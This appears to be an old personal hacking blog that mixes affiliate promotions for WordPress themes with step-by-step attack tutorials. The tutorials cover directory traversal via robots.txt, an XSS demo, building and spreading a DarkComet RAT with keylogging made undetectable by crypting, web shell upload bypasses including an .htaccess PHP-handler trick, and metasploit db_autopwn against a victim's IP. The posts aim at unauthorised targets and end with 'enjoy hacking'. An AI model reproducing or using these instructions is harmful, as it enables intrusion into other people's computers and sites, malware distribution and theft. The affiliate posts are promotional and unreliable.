Tuesday, February 14, 2012

Premium Wordpress Themes (Amazing designs and Awesome features)

Hello everyone!!! I am in this blog after a long time, i was busy in other things i missed this blog and my lovable readers. Today i am posting about Wordpress themes. As everyone knows wordpress is the best way to create blogs for business purposes and offers more customizations and flexibility. Wordpress offers you facility to use any theme of your choice. This post is dedicated to tell you which theme must be chosen and what we should see while selecting the perfect theme for our blog or website. The ease with which these themes get installed is really amazing. Its just one click installation. Here you can browse all themes that can be installed in a single click. Single Click Installation Wordpress Themes.

There are many themes available in internet claiming to be the best. But are they really the best? Here i will post many themes that are awesome and search engine friendly so they will not be an obstacle to search engines to locate your blogs. If you need simple, fast and fully featured theme then i suggest you to go for ColorWay WordPress Themes. Colorway is best that you expect from simple and faster theme. It is very light theme so it will help your website to load fast. It is featured with all most everything and provides you facility to customize everything.

 If you are searching for a theme suitable for business purpose then i suggest you few themes that are particularly designed for business niche. These themes are being used by many business websites and blogs and are getting good response. Browse the themes by going into the following link and then choose best after trying their free versions. Premium Business WordPress Themes

Really Its easy to setup amazing blogs and website with wordpress. If you want to setup a website for product review then there is a good wordpress theme for that also. Rethink Product Review Theme Rethink is an awesome theme with full customization support.

 I personally recommend you to buy a bundle of themes at very low price and run as many blogs you want. You can also gift these wonderful themes to your tech-friends. These themes are love of every geek person who loves WEB. Buy these themes and suggest your friends also to buy these wonderful themes and set up personal websites and blogs. Get all premium themes at just $125

Please give me some credits and follow the link to browse all wonderful themes and buy anyone after testing. Also suggest your dear ones. Follow this link to browse all themes and buy Single Click Installation Wordpress Themes Share this post with your friends and help them to find best wordpress themes. :)

Tuesday, November 8, 2011

Directory traversal using ROBOTS.txt

Hi Friends first of all let me tell u What is Directory Transversal
Directory Transversal allows you to change what directory you are located in by typing in the URL bar. This allows you to access pages you normally can't on an insecure webpage.
Now what is robots.txt-

"Web site owners use the /robots.txt file to give instructions about their site to web robots; this is called The Robots Exclusion Protocol."
It works likes this: a robot wants to vists a Web site URL, say http://www.example.com/welcome.html. Before it does so, it firsts checks for http://www.example.com/robots.txt, and finds:

User-agent: *
Disallow: /

The "User-agent: *" means this section applies to all robots. The "Disallow: /" tells the robot that it should not visit any pages on the site.
==>Now next step is Finding disallowed pages

This is quite simple. Go to the main page and type in:



Http://www.[hostname].ext/robots.txt

In this textfile, you will see something that looks like this:

User-agent: *

Allow: /searchhistory/

Disallow: /news?output=xhtml&

Allow: /news?output=xhtml

Disallow: /search

Disallow: /groups

Disallow: /images

Disallow: /catalogs


>>User-Agent can be something else then* this means all. This can be a type of webbrowser. That would block the user agent.

Now our last step is to access pages since we can traverse those directories which are allowed but what about those which are disallowed for traversal. here we can try a trick that may help you to get into the restricted directory:


Type a directory that comes after CODE:

Disallow:

Chances are, you will get denied.

To get access you could see if you can mod your cookie, but that's not what I'm talking about.

Now type in the same directory as before, but add /Anyrandomletters&symbols

It should look like this:

[host]/disalloweddirectory/Anyrandomletters&symbols



This will give you an error saying not found. Good.

Now for the Directory Transversal part:

[host]/disalloweddirectory/anyrandomletters&symbols/../



You should have noticed the /../ That is the Directory Transversal part.

What this does is send you back one directory, and if the website is insecure, then you can get access to the Disallowed area.

This doesn't work with just about every popular site, but works with privately owned sites which are nor properly coded.
Thnx :-) Enjoy hacking :-)

Thursday, November 3, 2011

XSS Attack (Cross Site Scripting)

Hello Friends, Today i am sharing about the most common vulnerability which is generally found in most of websites because of poor coding. First f all let me tell you what XSS is.
WHAT IS XSS: reference wikipedia -
"Cross-zone scripting is a browser exploit taking advantage of a vulnerability within a zone-based security solution. The attack allows content (scripts) in unprivileged zones to be executed with the permissions of a privileged zone - i.e.
a privilege escalation within the client (web browser) executing the script.
The vulnerability could be:

* a web browser bug which under some conditions allows content (scripts)
in one zone to be executed with the permissions of a higher privileged zone.

* a web browser configuration error; unsafe sites listed in privileged zones.

* a cross-site scripting vulnerability within a privileged zone

A common attack scenario involves two steps.
The first step is to use a Cross Zone Scripting vulnerability
to get scripts executed within a privileged zone. To complete the attack,
then perform malicious actions on the computer using insecure ActiveX components.

This type of vulnerability has been exploited to silently install
various malware (such as spyware, remote control software, worms and such)
onto computers browsing a malicious web page."

Second step is to code a XSS vulnerable page so here we go:

open notepad and copy content from links given below
save this page as index.html => http://pastebin.com/Y6pN08pv

save this page as: XSS.php => http://pastebin.com/L0E4bJKc
open index.html in firefox
enter a value and search ,return on the page of search and enter
send the form


Above was just a simple "non persistent XSS" ,However a XSS attack can lead to serious problems such as cookie stealing,privacy disclosure,defacing etc. You can code a cookie grabber and then u can redirect your victim to that script. Persistent XSS allows attacker to change the content of site means data so the website will look normal as all the links are given by the pwner of the site hence the victims will easily trust and may follow evil's link :P

now next step is to secure XSS:

simply use
use htmlspecialchars() function in PHP or use other function: htmlentities() :-)
code ==> http://pastebin.com/Cc4quJVB

In next post i'll write about How to bypass filter to get XSS on site and will share many more tricks that can be played in XSS vulnerable site ;-)
Happy hacking at your own risk :)

Monday, October 10, 2011

Earn money online

Hey frnds this  is just a post apart from hacking, Those who want to make some money online please register urself and start earning.its easy and real. 

Sunday, July 3, 2011

Hack a PC Using RAT(Remote administration tool)

Hello Friends ...Sorry i am writing after a long time coz i was busy in some stuffs. Here today i will tell you how to hack a pc using DARK COMET RAT.  This tutorial is so easy to start...

First go to http://www.no-ip.com/ and create an account. Then

: Choose your host name.
: Your ip address
: Create host.

As shown below in the pic :
now 




No-Ip is set ,now lets download the DUC to update your ip automatically!
DUC download : http://www.no-ip.com/downloads.php
Start the DUC client after installation.

Now to download DarkComet , you can visit http://www.darkcomet-rat.com/ to find some info and download.
After installation ,open DarkComet client. If you don't want to use the DUC client for No-IP you can do it with DarkComet. Here is how to do it :

Now lets build the server ,go to Edit Server => Server Module.

Press Generate few times

1 : Enter your no-ip host name
2 : Choose your port
3 : Test Network
4 : Add this to your configuration
5 : Click your host to set it.


Make sure your port is open! You can check it here http://canyouseeme.org/
Next step you can choose but this is what i use ,if you don't know what to do just copy the settings

again if u want key logs then :
Now its time to build your server!
note :: After building you need to crypt your server to get it FUD for spreading!

Now to see your vics ,press +listen ,set your port and press listen!


And you are done...wooo000hhH
This was all about use of RAT but u need to crypt your server to make it undetectable from anti viruses.. so have fun and enjoy hacking at your own risk....good luck.

Friday, April 8, 2011

Uploading a SHELL

Hello friends!!!
I have not written this article despite i am sharing this because i think it will be helpful to those who upload their shells on target but it does not execute.
NOTE: I am not responsible for what you do with this information.

How to Upload a Shell

First of all, when uploading a shell, you MUST be able to problem solve. Some of the techniques I have compiled in this guide aren't exactly easy for most of you.

I am separating this guide into steps, and sometimes, this won't always work. In fact, most of the time (If the coder was that bright at all), these techniques will NOT work. So don't go posting away about it not working for you on one site..

First though, you need some form of upload script. I don't care if it's a public upload script, or one off an admin page.

Step 1
First off, try the shell with the regular php extension. I've seen this work for admin panels a lot of the time, because the coder doesn't think anyone but the site admin will be messing with it.. He doesn't stop to think about security.

Step 2
If step 1 doesn't work, you're going to have to try different extensions that also execute php on most servers. These would include .php2, .php3, .php4, .php5, .phtml, .htm (rare cases), .html (rare cases), and no extension at all (rare cases). Also, you can attempt using a null to make it work.

Examples:

Code:
shell.php.jpg
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg%:
shell.php.jpg;
shell.php.jpg;
shell.php.jpg;
shell.php.jpg:;

Step 3
Now on to step 3, it seems that step 2 didn't work for you. Sometimes, (now this is occasional), the file extensions it will accept are in the source of the page itself.. this is most common for java uploaders and similar. So to check for this, obviously view the source of the page and check it over for anything that looks like file extensions. If you do find any, you are going to want to use a tool like Firebug (Addon for Firefox), to edit the source to include the extension "php".

Step 4
Next, maybe the script is just blocking the .php, .php2, .php3, ect. scripts from being uploaded. The best way to counter-act this is to upload a .htaccess file. Go into notepad or w/e and paste this in:
Code:
AddType application/x-httpd-php .shell .other .jpg .gif .png .mov .pdf
Then upload the shell with one of those extensions. It should execute as php even with the wierd extension.

Step 5
Last but not least, is the header modification trick. This one is a little complicated (Will add pics in a min..) To do this, you need something like the Tamper Data addon for Firefox. In this example, I'll use that addon. What you want to do is after you attempt to send the post data, tamper the data before it sends. Then you will want to scroll through the raw data until you find the header data.. let's say our header is Application/Data... you would want to change that to something appropriate to the scripts intended purpose, like Image/Jpeg for an image upload script.

That concludes a guide for how to upload a shell for now, will add more to it later,  enjoy!
happy hacking :))

Tuesday, April 5, 2011

Hacking a computer with metasploit

Hello friends today i am sharing how to use metasploit to exploit a remote computer.
Here we go :
NOTE : I am not responsible for what you do with this information.
Download latest Metasploit framework from its official site - www.metasploit.com
Okay now when you downloaded it, now install, and between installation it'll ask you if you want to install Nmap also, say YES.

Nmap is a software which allows you to check the open ports, OS, sevices, etc of a remote computer just with its IP.

Now launch msfconsole.

It'll take sometime as it has more than 600 exploits and 200 payloads.

Type = db_driver sqlite3

=>> It'll enable the database driver.

Now type = db_create

=>> It'll create a database.

Type = nmap

=>> It'll load the Nmap up.

Now type = db_nmap -sT -sV [victim's ip address]

=>> It'll show the open ports of victim's machine.

Now finally type = db_autopwn -p -t -e

=>> Now it'll try different-different exploits on the remote machine automatically, and if it found the exploit working, it'll give you a CMD shell for the remote PC!

Now you have full access to that PC you can do anything with this PC.
Enjoy hacking